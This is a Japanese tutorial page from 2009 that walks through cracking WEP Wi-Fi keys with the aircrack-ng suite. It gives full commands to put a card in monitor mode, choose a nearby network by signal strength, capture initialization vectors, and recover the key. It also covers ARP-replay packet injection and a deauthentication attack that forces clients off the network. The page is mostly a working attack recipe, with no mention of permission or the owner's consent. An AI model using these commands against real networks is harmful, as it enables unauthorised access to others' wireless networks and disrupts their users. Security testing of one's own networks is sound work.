まずmake + make installでインストールした後、
rootでコマンド'airodump-ng-oui-update'を使い、Airodump-ng OUI ファイルをインストールもしくはアップデートする。
(yumなどを使うと最新版でない可能性があるのでやめておく。)
iwlist scan で自分のカードを調べることができる。
ワイヤレスカードをモニターモードにする
airmon-ng start wlan0
ちゃんと動いてるかは“iwconfig”でチェックできる。
airodump-ngを使い、ネットワークを探す(wlan0は自分のカード名)
airodump-ng wlan0
そして、シグナルが最も強いネットワークをターゲットにする。
Beaconsが大きければ大きいほど、シグナルは強い。(この場合、00:01:02:03:04:05 を選ぶ。)
初期ベクタ(IV:Initialization Vector)を集める
airodump-ng -c 11 --bssid 00:01:02:03:04:05 -w dump wlan0
- cはチャンネル合わせ、-w dumpはダンプをディスクに書き込む、--bssidはAP MACアドレス合わせ。
さらに詳しいことはman airodump-ngを参照。
WEPをクラックするのに必要なIVs数は、40 000~85 000。
もし集めることができたなら、
aircrack-ng -b 00:01:02:03:04:05 dump-01.cap
で、WEP keyをクラックしてみる。
- b ターゲットのBSSID、dump-01.capは集めたパケットを含んでいるファイル名。(ファイルは複数使うことも可。
簡易説明:
airodump-ng - (無線LANアダプタをmonitorモードにして)無線LANからパケットをキャプチャして、ファイルにダンプする。
aircrack-ng - airodump-ngでダンプしたパケットから、キーを解析する。
aireplay-ng - 流れているトラフィックが少なくてIVの集まりが悪いとき、自分からトラフィックを生成(パケットインジェクション)してIVを発生させる。
airmon-ng - モニターモードを可能にする。
モニターモードについて:
wlan0をモニターモードにする
airmon-ng start wlan0
wlan0をモニターモードにして、チャンネルを8にする
airmon-ng start wlan0 8
wlan0を止める
airmon-ng stop wlan0
ステータスをチェックする
airmon-ng
パケットインジェクションするには:
1.まずワイヤレスカードとドライバが対応しているかどうか確かめる。
一番簡単な確かめ方は、インジェクションテストアタックをしてみる。
(注:モニターモードを起動してなければならない)
aireplay-ng -9 wlan0
隠しSSIDや特定のSSIDをチェックしたい場合は:
aireplay-ng --test -e teddy -a 00:14:6C:7E:40:80 ath0
-9(--test)はテストモード、-e teddyはSSID(ネットワークの名前)、-a 00:de:ad:ca:fe:00 ath0 はアクセスポイントのMACアドレス。
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--test : tests injection and quality (-9)
パケットインジェクションをさらに早めるには:
ARPリクエスト リインジェクション(ARP-request reinjection)を使う。
適当なやり方:
aireplay-ngとairodump-ngを同時に起動する。
clientがターゲットネットワーク上に現れるのを待って、
aireplay-ng - -arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0
\-b ターゲットのBSSID, -h 繋がってるclientのMACアドレス
そしてしばらくAPRパケットがつくのを待つ。(これにはしばらくかかる。)
もし成功したならば、下のような表示が出る。
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...
もう少し攻撃的なやり方:
deauthentication attackを使う。
ほとんどのOS上では、接続が切れた時にAPRキャッシュも削除されるため、再接続を要求する時にAPRリクエストを送らなければならない。つまり、clientの接続を強制的に切らせて無理やり再接続させてやるのがこのやり方。
さらに再接続中に、ESSIDやキーストリーム(keystream)も検知できるかもしれないおまけ付き。
aireplay-ngとairodump-ngは起動したままで、別の窓を開きdeauthentication attackする。
aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 rausb0
-aはアクセスポイントのBSSID, -cはターゲットのclientのMACアドレス。
似たようなツール:
aircrack-ngと似ているが、使い方が少し違う。
1.パラメータ-ivsは絶対使わない。
2.airodump-ngでできた解読用の読み取りファイルを使えるのは1つのみ?
aircrack-ptw output-01.cap
最終更新:2009年08月28日 10:00